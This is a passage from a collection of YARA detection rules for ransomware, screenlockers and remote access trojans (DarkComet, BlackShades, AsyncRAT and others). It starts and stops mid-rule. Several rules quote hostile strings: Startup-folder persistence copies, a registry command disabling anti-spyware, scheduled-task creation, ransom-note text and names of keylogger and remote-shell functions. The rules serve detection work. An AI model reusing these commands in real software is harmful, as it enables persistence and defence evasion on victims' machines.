"02ecfb44b9b11b846ea8233d524ecda3" hash16 = "703a6ebe71131671df6bc92086c9a641" hash17 = "df23629b4a4aed05d6a453280256c05a" hash18 = "07466ff2572f16c63e1fee206b081d11" hash19 = "792a1c0971775d32bad374b288792468" hash20 = "fb7fd5623fa6b7791a221fad463223cd" hash21 = "83a562aab1d66e5d170f091b2ae6a213" hash22 = "99214c8c9ff4653b533dc1b19a21d389" hash23 = "a92aec198eee23a3a9a145e64d0250ee" hash24 = "e0f7e6b96ca72b9755965b9dac3ce77e" hash25 = "f520fc947a6d5edb87aa01510bee9c8d" hash26 = "6d7babbe5e438539a9fa2c5d6128d3b4" hash27 = "3133c2231fcee5d6b0b4c988a5201da1" hash28 = "e5b1d198edc413376e0c0091566198e4" hash29 = "50515b5a6e717976823895465d5dc684" hash30 = "510389e8c7f22f2076fc7c5388e01220" hash31 = "60573c945aa3b8cfaca0bdb6dd7d2019" hash32 = "394187056697463eba97382018dfe151" hash33 = "045a5d3c95e28629927c72cf3313f4cd" hash34 = "70951624eb06f7db0dcab5fc33f49127" hash35 = "5def9e3f7b15b2a75c80596b5e24e0f4" hash36 = "35a42fb1c65ebd7d763db4abb26d33b0" hash37 = "b0030f5072864572f8e6ba9b295615fc" hash38 = "62706f48689f1ba3d1d79780010b8739" hash39 = "be86183fa029629ee9c07310cd630871" hash40 = "9755c3920d3a38eb1b5b7edbce6d4914" hash41 = "cb42611b4bed97d152721e8db5abd860" hash42 = "5475344d69fc6778e12dc1cbba23b382" hash43 = "8c1bf70742b62dec1b350a4e5046c7b6" hash44 = "6a6541c0f63f45eff725dec951ec90a7" hash45 = "a592c5bee0d81ee127cbfbcb4178afe8" hash46 = "b74c6d86ec3904f4d73d05b2797f1cc3" hash47 = "28d76fd4dd2dbfc61b0c99d2ad08cd8e" hash48 = "fc859ae67dc1596ac3fdd79b2ed02910" hash49 = "cb65d5e929da8ff5c8434fd8d36e5dfb" hash50 = "888dd1acce29cd37f0696a0284ab740a" hash51 = "0e3e231c255a5eefefd20d70c247d5f0" hash52 = "e5ebe35d934106f9f4cebbd84e04534b" hash53 = "3b580f1fa0c961a83920ce32b4e4e86d" hash54 = "d807a704f78121250227793ea15aa9c4" hash55 = "db462159bddc0953444afd7b0d57e783" hash56 = "2ed4945fb9e6202c10fad0761723cb0e" hash57 = "51183ab4fd2304a278e36d36b5fb990c" hash58 = "65d602313c585c8712ea0560a655ddeb" hash59 = "0128c12d4a72d14bb67e459b3700a373" hash60 = "5d3dfc161c983f8e820e59c370f65581" hash61 = "d4dd475179cd9f6180d5b931e8740ed6" hash62 = "5dd3782ce5f94686448326ddbbac934c" hash63 = "c85c6171a7ff05d66d497ad0d73a51ed" hash64 = "b42dda2100da688243fe85a819d61e2e" hash65 = "a5cf8f2b7d97d86f4d8948360f3db714" hash66 = "293cae15e4db1217ea72581836a6642c" hash67 = "56c3a5bae3cb1d0d315c1353ae67cf58" hash68 = "c86dc1d0378cc0b579a11d873ac944e7" hash69 = "54cef0185798f3ec1f4cb95fad4ddd7c" hash70 = "eb2eff9838043b67e8024ccadcfe1a8f" hash71 = "78778fe62ee28ef949eec2e7e5961ca8" hash72 = "e75c5762471a490d49b79d01da745498" hash73 = "1564d3e27b90a166a0989a61dc3bd646" hash74 = "59ba111403842c1f260f886d69e8757d" hash75 = "d840dfbe52a04665e40807c9d960cccc" hash76 = "77f543f4a8f54ecf84b15da8e928d3f9" hash77 = "bd9512679fdc1e1e89a24f6ebe0d5ad8" hash78 = "202f042d02be4f6469ed6f2e71f42c04" hash79 = "28f827673833175dd9094002f2f9b780" hash80 = "0ff10287b4c50e0d11ab998a28529415" hash81 = "644daa2b294c5583ce6aa8bc68f1d21f" hash82 = "1c9db47778a41775bbcb70256cc1a035" hash83 = "c203bc5752e5319b81cf1ca970c3ca96" hash84 = "656f2571e4f5172182fc970a5b21c0e7" hash85 = "c17122a9864e3bbf622285c4d5503282" hash86 = "f9e3a9636b45edbcef2ee28bd6b1cfbb" hash87 = "291ff8b46d417691a83c73a9d3a30cc9" hash88 = "1217877d3f7824165bb28281ccc80182" hash89 = "18419d775652f47a657c5400d4aef4a3" hash90 = "04417923bf4f2be48dd567dfd33684e2" hash91 = "31efe902ec6a5ab9e6876cfe715d7c84" hash92 = "a2e4472c5097d7433b91d65579711664" hash93 = "98854d7aba1874c39636ff3b703a1ed1" hash94 = "5149f0e0a56b33e7bbed1457aab8763f" hash95 = "7a4338193ce12529d6ae5cfcbb1019af" hash96 = "aa7f37206aba3cbe5e11d336424c549a" hash97 = "51cad5d45cdbc2940a66d044d5a8dabf" hash98 = "85edb7b8dee5b60e3ce32e1286207faa" hash99 = "34ca5292ae56fea78ba14abe8fe11f06" hash100 = "154187f07621a9213d77a18c0758960f" hash101 = "4e633f0478b993551db22afddfa22262" hash102 = "5c50e4427fe178566cada96b2afbc2d4" hash103 = "263001ac21ef78c31f4ca7ad2e7f191d" hash104 = "53fd9e7500e3522065a2dabb932d9dc5" hash105 = "48043dc55718eb9e5b134dac93ebb5f6" hash106 = "ca19a1b85363cfed4d36e3e7b990c8b6" hash107 = "41b5403a5443a3a84f0007131173c126" hash108 = "6f3833bc6e5940155aa804e58500da81" hash109 = "9bd50fcfa7ca6e171516101673c4e795" hash110 = "6d52ba0d48d5bf3242cd11488c75b9a7" hash111 = "c52afb663ff4165e407f53a82e34e1d5" hash112 = "5a16396d418355731c6d7bb7b21e05f7" hash113 = "05559db924e71cccee87d21b968d0930" hash114 = "824312bf8e8e7714616ba62997467fa8" hash115 = "dfec435e6264a0bfe47fc5239631903c" hash116 = "3512e7da9d66ca62be3418bead2fb091" hash117 = "7ad4df88db6f292e7ddeec7cf63fa2bc" hash118 = "d512da73d0ca103df3c9e7c074babc99" hash119 = "c622b844388c16278d1bc768dcfbbeab" hash120 = "170ffa1cd19a1cecc6dae5bdd10efb58" hash121 = "3a19c91c1c0baa7dd4a9def2e0b7c3e9" hash122 = "3b7ce3ceb8d2b85ab822f355904d47ce" hash123 = "a7bac2ace1f04a7ad440bd2f5f811edc" hash124 = "66594a62d8c98e1387ec8deb3fe39431" hash125 = "a1add9e5d7646584fd4140528d02e4c3" hash126 = "11328bbf5a76535e53ab35315321f904" hash127 = "048f19d79c953e523675e96fb6e417a9" hash128 = "eb65fc2922eafd62defd978a3215814b" hash129 = "51cc9987f86a76d75bf335a8864ec250" hash130 = "a7f91301712b5a3cc8c3ab9c119530ce" hash131 = "de976a5b3d603161a737e7b947fdbb9a" hash132 = "288a3659cc1aec47530752b3a31c232b" hash133 = "91da679f417040558059ccd5b1063688" hash134 = "4ce9a0877b5c6f439f3e90f52eb85398" hash135 = "1f9e097ff9724d4384c09748a71ef99d" hash136 = "7d8a64a94e71a5c24ad82e8a58f4b7e6" hash137 = "db119e3c6b57d9c6b739b0f9cbaeb6fd" hash138 = "52c9d25179bf010a4bb20d5b5b4e0615" hash139 = "4b9995578d51fb891040a7f159613a99" sample_filetype = "exe" yaragenerator = "https://github.com/Xen0ph0n/YaraGenerator" strings: $string0 = "n:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t;<<t;<<t;<<t;<<t;<<t;<<t;<<t;<<t<<<t;<<t;<<t;<<" $string1 = "t;<<t;<<t<<<t<<" $string2 = ">>><<<" condition: 2 of them } rule screenlocker_acroware { meta: description = "Rule to detect Acroware ScreenLocker" author = "Marc Rivero | @seifreed" reference = "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-august-31st-2018-devs-on-vacation/" strings: $s1 = "C:\\Users\\patri\\Documents\\Visual Studio 2015\\Projects\\Advanced Ransi\\Advanced Ransi\\obj\\Debug\\Advanced Ransi.pdb" fullword ascii $s2 = "All your Personal Data got encrypted and the decryption key is stored on a hidden" fullword ascii $s3 = "alphaoil@mail2tor.com any try of removing this Ransomware will result in an instantly " fullword ascii $s4 = "HKEY_CURRENT_USER\\SoftwareE\\Microsoft\\Windows\\CurrentVersion\\Run" fullword wide $s5 = "webserver, after 72 hours the decryption key will get removed and your personal" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 2000KB ) and all of them } rule jeff_dev_ransomware { meta: description = "Rule to detect Jeff DEV Ransomware" author = "Marc Rivero | @seifreed" reference = "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-august-31st-2018-devs-on-vacation/" strings: $s1 = "C:\\Users\\Umut\\Desktop\\takemeon" fullword wide $s2 = "C:\\Users\\Umut\\Desktop\\" fullword ascii $s3 = "PRESS HERE TO STOP THIS CREEPY SOUND AND VIEW WHAT HAPPENED TO YOUR COMPUTER" fullword wide $s4 = "WHAT YOU DO TO MY COMPUTER??!??!!!" fullword wide condition: ( uint16(0) == 0x5a4d and filesize < 5000KB ) and all of them } rule locdoor_ransomware { meta: description = "Rule to detect Locdoor/DryCry" author = "Marc Rivero | @seifreed" reference = "https://twitter.com/leotpsc/status/1036180615744376832" strings: $s1 = "copy \"Locdoor.exe\" \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\temp00000000.exe\"" fullword ascii $s2 = "copy wscript.vbs C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\wscript.vbs" fullword ascii $s3 = "!! Your computer's important files have been encrypted! Your computer's important files have been encrypted!" fullword ascii $s4 = "echo CreateObject(\"SAPI.SpVoice\").Speak \"Your computer's important files have been encrypted! " fullword ascii $s5 = "! Your computer's important files have been encrypted! " fullword ascii $s7 = "This program is not supported on your operating system." fullword ascii $s8 = "echo Your computer's files have been encrypted to Locdoor Ransomware! To make a recovery go to localbitcoins.com and create a wa" ascii $s9 = "Please enter the password." fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 600KB ) and all of them } rule screenlocker_5h311_1nj3c706 { meta: description = "Rule to detect the screenlocker 5h311_1nj3c706" author = "Marc Rivero | @seifreed" reference = "https://twitter.com/demonslay335/status/1038060120461266944" strings: $s1 = "C:\\Users\\Hoang Nam\\source\\repos\\WindowsApp22\\WindowsApp22\\obj\\Debug\\WindowsApp22.pdb" fullword ascii $s2 = "cmd.exe /cREG add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\ActiveDesktop /v NoChangingWallPaper /t REG_DWOR" wide $s3 = "C:\\Users\\file1.txt" fullword wide $s4 = "C:\\Users\\file2.txt" fullword wide $s5 = "C:\\Users\\file.txt" fullword wide $s6 = " /v Wallpaper /t REG_SZ /d %temp%\\IMG.jpg /f" fullword wide $s7 = " /v DisableAntiSpyware /t REG_DWORD /d 1 /f" fullword wide $s8 = "All your file has been locked. You must pay money to have a key." fullword wide $s9 = "After we receive Bitcoin from you. We will send key to your email." fullword wide condition: ( uint16(0) == 0x5a4d and filesize < 200KB ) and all of them } rule shrug2_ransomware { meta: description = "Rule to detect Shrug2 ransomware" author = "Marc Rivero | @seifreed" reference = "https://blogs.quickheal.com/new-net-ransomware-shrug2/" strings: $s1 = "C:\\Users\\Gamer\\Desktop\\Shrug2\\ShrugTwo\\ShrugTwo\\obj\\Debug\\ShrugTwo.pdb" fullword ascii $s2 = "http://tempacc11vl.000webhostapp.com/" fullword wide $s4 = "Shortcut for @ShrugDecryptor@.exe" fullword wide $s5 = "C:\\Users\\" fullword wide $s6 = "http://clients3.google.com/generate_204" fullword wide $s7 = "\\Desktop\\@ShrugDecryptor@.lnk" fullword wide condition: ( uint16(0) == 0x5a4d and filesize < 2000KB ) and all of them } rule termite_ransomware { meta: description = "Rule to detect Termite Ransomware" author = "Marc Rivero | @seifreed" reference = "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-august-31st-2018-devs-on-vacation/" strings: $s1 = "C:\\Windows\\SysNative\\mswsock.dll" fullword ascii $s2 = "C:\\Windows\\SysWOW64\\mswsock.dll" fullword ascii $s3 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Termite.exe" fullword ascii $s4 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Payment.exe" fullword ascii $s5 = "C:\\Windows\\Termite.exe" fullword ascii $s6 = "\\Shell\\Open\\Command\\" fullword ascii $s7 = "t314.520@qq.com" fullword ascii $s8 = "(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 6000KB ) and all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule Adwind_JAR_PACKA : binary RAT Frutas Unrecom AlienSpy { meta: author = "Vitaly Kamluk, Vitaly.Kamluk@kaspersky.com" reference = "https://securelist.com/securelist/files/2016/02/KL_AdwindPublicReport_2016.pdf" last_modified = "2015-11-30" strings: $b1 = ".class" ascii $b2 = "c/a/a/" ascii $b3 = "b/a/" ascii $b4 = "a.dat" ascii $b5 = "META-INF/MANIFEST.MF" ascii condition: int16(0) == 0x4B50 and ($b1 and $b2 and $b3 and $b4 and $b5) } rule Adwind_JAR_PACKB : binary RAT Frutas Unrecom AlienSpy { meta: author = "Vitaly Kamluk, Vitaly.Kamluk@kaspersky.com" reference = "https://securelist.com/securelist/files/2016/02/KL_AdwindPublicReport_2016.pdf" last_modified = "2015-11-30" strings: $c1 = "META-INF/MANIFEST.MF" ascii $c2 = "main/Start.class" ascii $a1 = "con g/con g.perl" ascii $b1 = "java/textito.isn" ascii condition: int16(0) == 0x4B50 and ($c1 and $c2 and ($a1 or $b1)) } rule crime_win_rat_AlienSpy: binary RAT Frutas Unrecom AlienSpy { meta: description = "Alien Spy Remote Access Trojan" author = "General Dynamics Fidelis Cybersecurity Solutions - Threat Research Team" reference_1 = "www.fidelissecurity.com/sites/default/files/FTA_1015_Alienspy_FINAL.pdf" reference_2 = "www.fidelissecurity.com/sites/default/files/AlienSpy-Configs2_1_2.csv" date = "2015-04-04" filetype = "Java" hash_1 = "075fa0567d3415fbab3514b8aa64cfcb" hash_2 = "818afea3040a887f191ee9d0579ac6ed" hash_3 = "973de705f2f01e82c00db92eaa27912c" hash_4 = "7f838907f9cc8305544bd0ad4cfd278e" hash_5 = "071e12454731161d47a12a8c4b3adfea" hash_6 = "a7d50760d49faff3656903c1130fd20b" hash_7 = "f399afb901fcdf436a1b2a135da3ee39" hash_8 = "3698a3630f80a632c0c7c12e929184fb" hash_9 = "fdb674cadfa038ff9d931e376f89f1b6" strings: $sa_1 = "META-INF/MANIFEST.MF" $sa_2 = "Main.classPK" $sa_3 = "plugins/Server.classPK" $sa_4 = "IDPK" $sb_1 = "config.iniPK" $sb_2 = "password.iniPK" $sb_3 = "plugins/Server.classPK" $sb_4 = "LoadStub.classPK" $sb_5 = "LoadStubDecrypted.classPK" $sb_7 = "LoadPassword.classPK" $sb_8 = "DecryptStub.classPK" $sb_9 = "ClassLoaders.classPK" $sc_1 = "config.xml" $sc_2 = "options" $sc_3 = "plugins" $sc_4 = "util" $sc_5 = "util/OSHelper" $sc_6 = "Start.class" $sc_7 = "AlienSpy" $sc_8 = "PK" condition: uint16(0) == 0x4B50 and filesize < 800KB and ( (all of ($sa_*)) or (all of ($sb_*)) or (all of ($sc_*)) ) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule Adzok : binary RAT Adzok { meta: author = " Kevin Breen <kevin@techanarchy.net>" Description = "Adzok Rat" Versions = "Free 1.0.0.3," date = "2015/05" ref = "http://malwareconfig.com/stats/Adzok" maltype = "Remote Access Trojan" filetype = "jar" strings: $a1 = "config.xmlPK" $a2 = "key.classPK" $a3 = "svd$1.classPK" $a4 = "svd$2.classPK" $a5 = "Mensaje.classPK" $a6 = "inic$ShutdownHook.class" $a7 = "Uninstall.jarPK" $a8 = "resources/icono.pngPK" condition: 7 of ($a*) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule win_asyncrat_j1 { meta: author = "Johannes Bader @viql" date = "2020-04-26" description = "detects AsyncRAT" references = "https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp" tlp = "white" strings: $str_anti_1 = "VIRTUAL" wide $str_anti_2 = "vmware" wide $str_anti_3 = "VirtualBox" wide $str_anti_4 = "SbieDll.dll" wide $str_miner_1 = "--donate-level=" wide $str_b_rev_run = "\\nuR\\noisreVtnerruC\\swodniW\\tfosorciM\\erawtfoS" wide $str_b_msg_pack_1 = "(ext8,ext16,ex32) type $c7,$c8,$c9" wide $str_b_msg_pack_2 = "(never used) type $c1" wide $str_b_schtask_1 = "/create /f /sc ONLOGON /RL HIGHEST /tn \"'" wide $str_b_schtask_2 = "\"' /tr \"'" wide $str_config_1 = "Antivirus" wide $str_config_2 = "Pastebin" wide $str_config_3 = "HWID" wide $str_config_4 = "Installed" wide $str_config_5 = "Pong" wide $str_config_6 = "Performance" wide condition: all of ($str_anti_*) and 4 of ($str_config_*) and ( all of ($str_miner_*) or 3 of ($str_b_*) ) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule BlackShades_3 : Trojan RAT { meta: description = "BlackShades RAT" author = "botherder https://github.com/botherder" strings: $mod1 = /(m)odAPI/ $mod2 = /(m)odAudio/ $mod3 = /(m)odBtKiller/ $mod4 = /(m)odCrypt/ $mod5 = /(m)odFuctions/ $mod6 = /(m)odHijack/ $mod7 = /(m)odICallBack/ $mod8 = /(m)odIInet/ $mod9 = /(m)odInfect/ $mod10 = /(m)odInjPE/ $mod11 = /(m)odLaunchWeb/ $mod12 = /(m)odOS/ $mod13 = /(m)odPWs/ $mod14 = /(m)odRegistry/ $mod15 = /(m)odScreencap/ $mod16 = /(m)odSniff/ $mod17 = /(m)odSocketMaster/ $mod18 = /(m)odSpread/ $mod19 = /(m)odSqueezer/ $mod20 = /(m)odSS/ $mod21 = /(m)odTorrentSeed/ $tmr1 = /(t)mrAlarms/ $tmr2 = /(t)mrAlive/ $tmr3 = /(t)mrAnslut/ $tmr4 = /(t)mrAudio/ $tmr5 = /(t)mrBlink/ $tmr6 = /(t)mrCheck/ $tmr7 = /(t)mrCountdown/ $tmr8 = /(t)mrCrazy/ $tmr9 = /(t)mrDOS/ $tmr10 = /(t)mrDoWork/ $tmr11 = /(t)mrFocus/ $tmr12 = /(t)mrGrabber/ $tmr13 = /(t)mrInaktivitet/ $tmr14 = /(t)mrInfoTO/ $tmr15 = /(t)mrIntervalUpdate/ $tmr16 = /(t)mrLiveLogger/ $tmr17 = /(t)mrPersistant/ $tmr18 = /(t)mrScreenshot/ $tmr19 = /(t)mrSpara/ $tmr20 = /(t)mrSprid/ $tmr21 = /(t)mrTCP/ $tmr22 = /(t)mrUDP/ $tmr23 = /(t)mrWebHide/ condition: 10 of ($mod*) or 10 of ($tmr*) } rule BlackShades2 : Trojan RAT { meta: author="Kevin Falcoz" date="26/06/2013" description="BlackShades Server" strings: $signature1={62 73 73 5F 73 65 72 76 65 72} $signature2={43 4C 49 43 4B 5F 44 45 4C 41 59 00 53 43 4B 5F 49 44} $signature3={6D 6F 64 49 6E 6A 50 45} condition: $signature1 and $signature2 and $signature3 } rule BlackShades_4 : rat { meta: description = "BlackShades" author = "Jean-Philippe Teissier / @Jipe_" date = "2013-01-12" filetype = "memory" version = "1.0" strings: $a = { 42 00 6C 00 61 00 63 00 6B 00 73 00 68 00 61 00 64 00 65 00 73 } $b = { 36 00 3C 00 32 00 20 00 32 00 32 00 26 00 31 00 39 00 3E 00 1D 00 17 00 17 00 1C 00 07 00 1B 00 03 00 07 00 28 00 23 00 0C 00 1D 00 10 00 1B 00 12 00 00 00 28 00 37 00 10 00 01 00 06 00 11 00 0B 00 07 00 22 00 11 00 17 00 00 00 1D 00 1B 00 0B 00 2F 00 26 00 01 00 0B } $c = { 62 73 73 5F 73 65 72 76 65 72 } $d = { 43 4C 49 43 4B 5F 44 45 4C 41 59 00 53 43 4B 5F 49 44 } $e = { 6D 6F 64 49 6E 6A 50 45 } $apikey = "f45e373429c0def355ed9feff30eff9ca21eec0fafa1e960bea6068f34209439" condition: any of ($a, $b, $c, $d, $e) or $apikey } rule BlackShades : Trojan { meta: author="Kevin Falcoz" date="26/06/2013" description="BlackShades Server" strings: $signature1={62 73 73 5F 73 65 72 76 65 72} $signature2={43 4C 49 43 4B 5F 44 45 4C 41 59 00 53 43 4B 5F 49 44} $signature3={6D 6F 64 49 6E 6A 50 45} condition: $signature1 and $signature2 and $signature3 } rule BlackShades_25052015 { meta: author = "Brian Wallace (@botnet_hunter)" date = "2014/04" ref = "http://malwareconfig.com/stats/PoisonIvy" ref = "http://blog.cylance.com/a-study-in-bots-blackshades-net" family = "blackshades" strings: $string1 = "bss_server" $string2 = "txtChat" $string3 = "UDPFlood" condition: all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule Bolonyokte : rat { meta: description = "UnknownDotNet RAT - Bolonyokte" author = "Jean-Philippe Teissier / @Jipe_" date = "2013-02-01" filetype = "memory" version = "1.0" strings: $campaign1 = "Bolonyokte" ascii wide $campaign2 = "donadoni" ascii wide $decoy1 = "nyse.com" ascii wide $decoy2 = "NYSEArca_Listing_Fees.pdf" ascii wide $decoy3 = "bf13-5d45cb40" ascii wide $artifact1 = "Backup.zip" ascii wide $artifact2 = "updates.txt" ascii wide $artifact3 = "vdirs.dat" ascii wide $artifact4 = "default.dat" $artifact5 = "index.html" $artifact6 = "mime.dat" $func1 = "FtpUrl" $func2 = "ScreenCapture" $func3 = "CaptureMouse" $func4 = "UploadFile" $ebanking1 = "Internet Banking" wide $ebanking2 = "(Online Banking)|(Online banking)" $ebanking3 = "(e-banking)|(e-Banking)" nocase $ebanking4 = "login" $ebanking5 = "en ligne" wide $ebanking6 = "bancaires" wide $ebanking7 = "(eBanking)|(Ebanking)" wide $ebanking8 = "Anmeldung" wide $ebanking9 = "internet banking" nocase wide $ebanking10 = "Banking Online" nocase wide $ebanking11 = "Web Banking" wide $ebanking12 = "Power" condition: any of ($campaign*) or 2 of ($decoy*) or 2 of ($artifact*) or all of ($func*) or 3 of ($ebanking*) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule Bozok : RAT { meta: author = " Kevin Breen <kevin@techanarchy.net>" date = "2014/04" ref = "http://malwareconfig.com/stats/Bozok" maltype = "Remote Access Trojan" filetype = "exe" strings: $a = "getVer" nocase $b = "StartVNC" nocase $c = "SendCamList" nocase $d = "untPlugin" nocase $e = "gethostbyname" nocase condition: all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule Cerberus : RAT memory { meta: description = "Cerberus" author = "Jean-Philippe Teissier / @Jipe_" date = "2013-01-12" filetype = "memory" version = "1.0" strings: $checkin = "Ypmw1Syv023QZD" $clientpong = "wZ2pla" $serverping = "wBmpf3Pb7RJe" $generic = "cerberus" nocase condition: any of them } rule Crimson: RAT { meta: author = " Kevin Breen <kevin@techanarchy.net>" Description = "Crimson Rat" date = "2015/05" ref = "http://malwareconfig.com/stats/Crimson" maltype = "Remote Access Trojan" filetype = "jar" strings: $a1 = "com/crimson/PK" $a2 = "com/crimson/bootstrapJar/PK" $a3 = "com/crimson/permaJarMulti/PermaJarReporter$1.classPK" $a4 = "com/crimson/universal/containers/KeyloggerLog.classPK" $a5 = "com/crimson/universal/UploadTransfer.classPK" condition: all of ($a*) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule CyberGate : RAT { meta: author = " Kevin Breen <kevin@techanarchy.net>" date = "2014/04" ref = "http://malwareconfig.com/stats/CyberGate" maltype = "Remote Access Trojan" filetype = "exe" strings: $string1 = {23 23 23 23 40 23 23 23 23 E8 EE E9 F9 23 23 23 23 40 23 23 23 23} $string2 = {23 23 23 23 40 23 23 23 23 FA FD F0 EF F9 23 23 23 23 40 23 23 23 23} $string3 = "EditSvr" $string4 = "TLoader" $string5 = "Stroks" $string6 = "####@####" $res1 = "XX-XX-XX-XX" $res2 = "CG-CG-CG-CG" condition: all of ($string*) and any of ($res*) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule DarkComet_1 : RAT { meta: description = "DarkComet RAT" author = "botherder https://github.com/botherder" strings: $bot1 = /(#)BOT#OpenUrl/ wide ascii $bot2 = /(#)BOT#Ping/ wide ascii $bot3 = /(#)BOT#RunPrompt/ wide ascii $bot4 = /(#)BOT#SvrUninstall/ wide ascii $bot5 = /(#)BOT#URLDownload/ wide ascii $bot6 = /(#)BOT#URLUpdate/ wide ascii $bot7 = /(#)BOT#VisitUrl/ wide ascii $bot8 = /(#)BOT#CloseServer/ wide ascii $ddos1 = /(D)DOSHTTPFLOOD/ wide ascii $ddos2 = /(D)DOSSYNFLOOD/ wide ascii $ddos3 = /(D)DOSUDPFLOOD/ wide ascii $keylogger1 = /(A)ctiveOnlineKeylogger/ wide ascii $keylogger2 = /(U)nActiveOnlineKeylogger/ wide ascii $keylogger3 = /(A)ctiveOfflineKeylogger/ wide ascii $keylogger4 = /(U)nActiveOfflineKeylogger/ wide ascii $shell1 = /(A)CTIVEREMOTESHELL/ wide ascii $shell2 = /(S)UBMREMOTESHELL/ wide ascii $shell3 = /(K)ILLREMOTESHELL/ wide ascii condition: 4 of ($bot*) or all of ($ddos*) or all of ($keylogger*) or all of ($shell*) } rule DarkComet_2 : rat { meta: description = "DarkComet" author = "Jean-Philippe Teissier / @Jipe_" date = "2013-01-12" filetype = "memory" version = "1.0" strings: $a = "#BEGIN DARKCOMET DATA --" $b = "#EOF DARKCOMET DATA --" $c = "DC_MUTEX-" $k1 = "#KCMDDC5#-890" $k2 = "#KCMDDC51#-890" condition: any of them } rule DarkComet_3 : RAT { meta: author = " Kevin Breen <kevin@techanarchy.net>" date = "2014/04" ref = "http://malwareconfig.com/stats/DarkComet" maltype = "Remote Access Trojan" filetype = "exe" strings: // Versions 2x $a1 = "#BOT#URLUpdate" $a2 = "Command successfully executed!" $a3 = "MUTEXNAME" wide $a4 = "NETDATA" wide // Versions 3x & 4x & 5x $b1 = "FastMM Borland Edition" $b2 = "%s, ClassID: %s" $b3 = "I wasn't able to open the hosts file" $b4 = "#BOT#VisitUrl" $b5 = "#KCMDDC" condition: all of ($a*) or all of ($b*) } rule DarkComet_Keylogger_File : RAT { meta: author = "Florian Roth" description = "Looks like a keylogger file created by DarkComet Malware" date = "25.07.14" reference = "https://raw.githubusercontent.com/Neo23x0/Loki/master/signatures/thor-hacktools.yar" score = 50 strings: $magic = "::" $entry = /\n:: [A-Z]/ $timestamp = /\([0-9]?[0-9]:[0-9][0-9]:[0-9][0-9] [AP]M\)/ condition: ($magic at 0) and #entry > 10 and #timestamp > 10 } rule DarkComet_4 : RAT { meta: reference = "https://github.com/bwall/bamfdetect/blob/master/BAMF_Detect/modules/yara/darkcomet.yara" strings: $a1 = "#BOT#" $a2 = "WEBCAMSTOP" $a3 = "UnActiveOnlineKeyStrokes" $a4 = "#SendTaskMgr" $a5 = "#RemoteScreenSize" $a6 = "ping 127.0.0.1 -n 4 > NUL &&" condition: all of them } rule DarkComet_5 { meta: maltype = "DarkComet RAT" author = "https://github.com/reed1713" description = "Malware creates the MSDCSC directory, which is a common path utilized by DarkComet, as well as the mutex pattern." strings: $type="Microsoft-Windows-Security-Auditing" $eventid="4688" $data=/AppData\\Local\\Temp\\MSDCSC\\.+\.exe/ $type1="Microsoft-Windows-Security-Auditing" $eventid1="4674" $data1=/DC_MUTEX-[0-9A-Z]{7}/ condition: ($type and $eventid and $data) or ($type1 and $eventid1 and $data1) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule FlyingKitten : rat { meta: Author = "CrowdStrike, Inc" Date = "2014/05/13" Description = "Flying Kitten RAT" Reference = "http://blog.crowdstrike.com/cat-scratch-fever-crowdstrike-tracks-newly-reported-iranian-actor-flying-kitten" strings: $classpath = "Stealer.Properties.Resources.resources" $pdbstr = "\\Stealer\\obj\\x86\\Release\\Stealer.pdb" condition: all of them and uint16(0) == 0x5A4D and uint32(uint32(0x3c)) == 0x4550 and uint16(uint32(0x3C) + 0x16) & 0x2000 == 0 and ((uint16(uint32(0x3c)+24) == 0x010b and uint32(uint32(0x3c)+232) > 0) or (uint16(uint32(0x3c)+24) == 0x020b and uint32(uint32(0x3c)+248) > 0)) } rule CSIT_14003_03 : installer RAT { meta: Author = "CrowdStrike, Inc" Date = "2014/05/13" Description = "Flying Kitten Installer" Reference = "http://blog.crowdstrike.com/cat-scratch-fever-crowdstrike-tracks-newly-reported-iranian-actor-flying-kitten" strings: $exename = "IntelRapidStart.exe" $confname = "IntelRapidStart.exe.config" $cabhdr = { 4d 53 43 46 00 00 00 00 } condition: all of them } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule APT_WIN_Gh0st_ver : RAT { meta: author = "@BryanNolen" date = "2012-12" type = "APT" version = "1.1" ref = "Detection of Gh0st RAT server DLL component" ref1 = "http://www.mcafee.com/au/resources/white-papers/foundstone/wp-know-your-digital-enemy.pdf" strings: $library = 